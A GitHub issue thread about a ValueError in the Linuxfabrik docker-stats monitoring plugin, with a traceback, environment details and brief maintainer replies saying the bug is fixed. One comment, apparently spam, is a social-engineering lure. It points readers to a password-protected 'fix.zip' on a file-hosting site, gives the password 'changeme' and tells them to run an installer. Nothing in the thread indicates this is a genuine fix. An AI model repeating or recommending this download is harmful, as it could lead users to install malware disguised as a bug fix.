### ISSUE TITLE
docker-stats: ValueError: could not convert string to float: '0B'

### ISSUE THREAD

**Issue by wwuck** [Linuxfabrik/monitoring-plugins#776]
### This issue respects the following points:

- [X] This is a **bug**, not a question or a setup/configuration issue.
- [X] This issue is **not** already reported on Github _(I've searched it)_.
- [X] I use the latest release of the Monitoring Plugins (https://github.com/Linuxfabrik/monitoring-plugins/releases).
- [X] I agree to follow Monitoring Plugins's [Code of Conduct](https://github.com/Linuxfabrik/monitoring-plugins/blob/main/CODE_OF_CONDUCT.md).

### Which variant of the Monitoring Plugins do you use?

- [X] .rpm/.deb package from repo.linuxfabrik.ch
- [ ] Compiled for Linux (.tar/.zip from download.linuxfabrik.ch)
- [ ] Compiled for Windows (from download.linuxfabrik.ch)
- [ ] Source Code from GitHub

### Bug description

I have some VM machines running as gitlab-runner docker hosts, so there are a lot of ephemeral docker containers showing up for a short time period.  I have just implemented the `docker-stats` check on these VM machines, and one of them reported an error.

```
Traceback (most recent call last):
  File "docker-stats.py", line 264, in 'module'
  File "docker-stats.py", line 206, in main
ValueError: could not convert string to float: '0B'
```

### Steps to reproduce - Plugin call

/usr/lib64/nagios/plugins/docker-stats

### Environment

```
# uname -a
Linux gitlab-runner-01 6.1.0-23-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.99-1 (2024-07-15) x86_64 GNU/Linux

# cat /etc/os-release 
PRETTY_NAME="Devuan GNU/Linux 5 (daedalus)"
NAME="Devuan GNU/Linux"
VERSION_ID="5"
VERSION="5 (daedalus)"
VERSION_CODENAME="daedalus"
ID=devuan
ID_LIKE=debian
HOME_URL="https://www.devuan.org/"
SUPPORT_URL="https://devuan.org/os/community"
BUG_REPORT_URL="https://bugs.devuan.org/"

# cat /etc/debian_version 
12.0

# apt-cache policy docker-ce
docker-ce:
  Installed: 5:27.1.2-1~debian.12~bookworm
  Candidate: 5:27.1.2-1~debian.12~bookworm
  Version table:
 *** 5:27.1.2-1~debian.12~bookworm 500
        500 https://download.docker.com/linux/debian bookworm/stable amd64 Packages
        100 /var/lib/dpkg/status

# docker --version
Docker version 27.1.2, build d01f264

# apt-cache policy linuxfabrik-monitoring-plugins 
linuxfabrik-monitoring-plugins:
  Installed: 2024060401-1
  Candidate: 2024060401-1
  Version table:
 *** 2024060401-1 500
        500 https://repo.linuxfabrik.ch/monitoring-plugins/debian bookworm-release/main amd64 Packages
        100 /var/lib/dpkg/status
     2023112901-1 500
        500 https://repo.linuxfabrik.ch/monitoring-plugins/debian bookworm-release/main amd64 Packages
     2023051201-1 500
        500 https://repo.linuxfabrik.ch/monitoring-plugins/debian bookworm-release/main amd64 Packages
```

### Plugin Version

docker-stats: v2023112901 by Linuxfabrik GmbH, Zurich/Switzerland

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by markuslf** [comment]
What's the output of
* `docker info`
* `docker stats --no-stream`

**Comment by markuslf** [comment]
Fixed, please test.
